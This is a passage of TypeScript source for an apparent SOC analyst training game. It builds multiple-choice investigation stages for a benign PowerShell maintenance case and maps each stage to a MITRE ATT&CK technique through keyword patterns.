  stage("benign-timeline","REASSESS","What does the timeline suggest?",[ev("be2","Unified timeline","Maintenance alignment",`Privileged logon, signed script, setting change, and ticket window align within 90 seconds`,time(a.baseTime,20))],answers("The activity is consistent with the approved change, pending outcome validation",["Any use of PowerShell confirms malicious execution","The ticket proves every action on the server is benign","The case should remain confirmed compromise despite matching evidence"],["Alignment supports legitimacy while preserving the need to validate results.","PowerShell is dual-use.","A ticket is evidence, not blanket authorization.","Current evidence weakens the compromise hypothesis."]),["Timeline alignment"]),
  stage("benign-scope","SCOPE","Which related activity should be scoped before closing?",[ev("be3","Automation platform","Run history",`The same signed script ran on two approved peer servers`,time(a.baseTime,25))],answers("Review the two peer runs for the same hash, operator, window, commands, and expected results",["Scope every PowerShell event in the enterprise for the year","Review only ${a.server} and ignore the documented peer runs","Scope all administrator activity regardless of script or window"],["The peer runs are a bounded, evidence-linked validation set.","The enterprise-wide range is disproportionate.","Known peer execution should be verified before closure.","Unfiltered administrator activity creates noise unrelated to this change."]),["Peer change scope"]),
  stage("benign-anomaly","FORM HYPOTHESIS","How should one unsigned child script on a peer be interpreted?",[ev("be4","EDR","Peer variation",`A helper script lacks a signature but its hash matches the approved repository`,time(a.baseTime,32))],answers("Treat it as a validation gap and compare provenance and behavior before changing the case assessment",["Treat it as confirmed attacker persistence immediately","Ignore it because the parent script was signed","Assume the repository was compromised"],["The anomaly deserves investigation, but matching provenance prevents an unsupported conclusion.","Unsigned code raises risk but does not alone prove compromise.","Parent trust does not automatically transfer to every child.","Repository compromise is possible but not yet supported."]),["Dual-use anomaly"]),
  stage("benign-request-2","CHOOSE NEXT ACTION","What evidence should be requested for the unsigned helper?",[ev("be5","Repository","Available records",`Commit history, build artifacts, and deployment logs are retained`,time(a.baseTime,40))],answers("Request commit provenance, artifact hash, deployment record, and the helper's process and network behavior",["Request only antivirus reputation for the filename","Request only the script author's employment status","Request only server uptime"],["These sources validate origin and observed behavior.","Filename reputation is weak for internal scripts.","Employment status does not validate this execution.","Uptime is unrelated to provenance."]),["Provenance review"]),
  stage("benign-priority","PRIORITIZE","Which finding should receive the most attention before closure?",[ev("be6","Validation summary","Findings",`Two runs match fully; one helper is unsigned but provenance is available`,time(a.baseTime,55))],answers("The unsigned helper's provenance and behavior",["The normal signed run on the original server","The approved maintenance window itself","An unrelated old PowerShell alert"],["It is the only unresolved deviation from the approved baseline.","The signed run is already strongly validated.","The window aligns with the activity.","The unrelated alert is outside this case's evidence chain."]),["Validation priority"]),
  stage("benign-close-ready","FINAL ASSESSMENT","What conditions justify closing as benign?",[ev("be7","Provenance","Helper validated",`Hash, commit, deployment, commands, and network behavior all match the approved change`,time(a.baseTime,80))],answers("Document the independent evidence, confirm expected results, and retain the alert for future detection",["Close solely because a change ticket exists","Suppress all PowerShell detections for administrators","Delete the case evidence after closure"],["Multiple independent sources now support the benign conclusion.","A ticket alone is insufficient.","Global suppression would hide future abuse.","Evidence should be retained for audit and tuning."]),["Closure evidence"]),
]; }

function expandStages(id:string,base:InvestigationStage[],a:CaseArtifacts){
  const additions=id===phishing.id?phishingExtensions(a):id===cloud.id?cloudExtensions(a):id===web.id?webExtensions(a):benignExtensions(a);
  if(id===phishing.id) return [...base.slice(0,-1),...additions];
  if(id===cloud.id) return [...base.slice(0,-1),...additions.slice(0,-1),base.at(-1)!,additions.at(-1)!];
  if(id===web.id) return [...base.slice(0,-1),...additions.slice(0,5),base.at(-1)!,...additions.slice(5)];
  return [...base.slice(0,-1),...additions,base.at(-1)!];
}

function inferTactic(item:InvestigationStage):NonNullable<InvestigationStage["tactic"]>{
  const text=`${item.id} ${item.phase} ${item.question} ${item.discoveries.join(" ")} ${item.evidence.map((entry)=>`${entry.title} ${entry.detail}`).join(" ")}`.toLowerCase();
  if(/oauth|consent|service principal|cloud credential/.test(text)) return {name:"PERSISTENCE",technique:"T1098.001 — Additional Cloud Credentials",evidence:item.evidence[0]?.title||item.phase};
  if(/mailbox|message-access|messages|email collection/.test(text)) return {name:"COLLECTION",technique:"T1114.002 — Remote Email Collection",evidence:item.evidence[0]?.title||item.phase};
  if(/aspx|web shell|w3wp|web-worker/.test(text)) return {name:"PERSISTENCE",technique:"T1505.003 — Web Shell",evidence:item.evidence[0]?.title||item.phase};
  if(/attachment|email security|campaign match/.test(text)) return {name:"INITIAL ACCESS",technique:"T1566.001 — Spearphishing Attachment",evidence:item.evidence[0]?.title||item.phase};
  if(/powershell|script block|signed script|helper script/.test(text)) return {name:"EXECUTION",technique:"T1059.001 — PowerShell",evidence:item.evidence[0]?.title||item.phase};
  if(/scheduled task|task scheduler|persistence removal/.test(text)) return {name:"PERSISTENCE",technique:"T1053.005 — Scheduled Task/Job",evidence:item.evidence[0]?.title||item.phase};
  if(/client\.bin|payload|dns|domain/.test(text)) return {name:"COMMAND AND CONTROL",technique:"T1105 — Ingress Tool Transfer",evidence:item.evidence[0]?.title||item.phase};
  if(/smb|remote service|secondaryhost|downstream|peer web|peer node/.test(text)) return {name:"LATERAL MOVEMENT",technique:"T1021 — Remote Services",evidence:item.evidence[0]?.title||item.phase};
  if(/credential|lsass/.test(text)) return {name:"CREDENTIAL ACCESS",technique:"T1003.001 — LSASS Memory",evidence:item.evidence[0]?.title||item.phase};
  if(/logon|authentication|account|identity|kerberos|ticket/.test(text)) return {name:"DEFENSE EVASION",technique:"T1078 — Valid Accounts",evidence:item.evidence[0]?.title||item.phase};
  if(item.phase==="SCOPE"||item.phase==="PRIORITIZE") return {name:"DISCOVERY",technique:"T1018 — Remote System Discovery",evidence:item.evidence[0]?.title||item.phase};
  return {name:"DISCOVERY",technique:"T1082 — System Information Discovery",evidence:item.evidence[0]?.title||item.phase};
}

const blueprints=[phishing,cloud,web,benign];
export function generateIntrusionCase(seed:number,difficulty:Difficulty,recentFingerprints:string[]=[]):IntrusionCase { const random=rng(seed); let candidates=blueprints.filter(b=>!recentFingerprints.includes(b.id)); if(!candidates.length)candidates=blueprints; const blueprint=pick(candidates,random); const environment=pick(blueprint.environments,random); const a=artifacts(seed,environment); const stages=expandStages(blueprint.id,blueprint.build(a,difficulty),a).map((item)=>({...item,tactic:item.tactic||inferTactic(item),answers:shuffleAnswers(item.answers,random)})); const outcome=pick(blueprint.outcomes,random); return {seed,caseId:String(1000+(seed%9000)).padStart(4,"0"),fingerprint:blueprint.id,difficulty,environment,tags:blueprint.tags,title:"New SOC investigation",assignment:`Triage an unfolding ${environment.toLowerCase()} security case. Evidence will be released as your investigation progresses.`,artifacts:a,stages,outcome}; }
export function seedFromNow(){ return Math.abs((Date.now() ^ Math.floor(Math.random()*0x7fffffff))|0); }
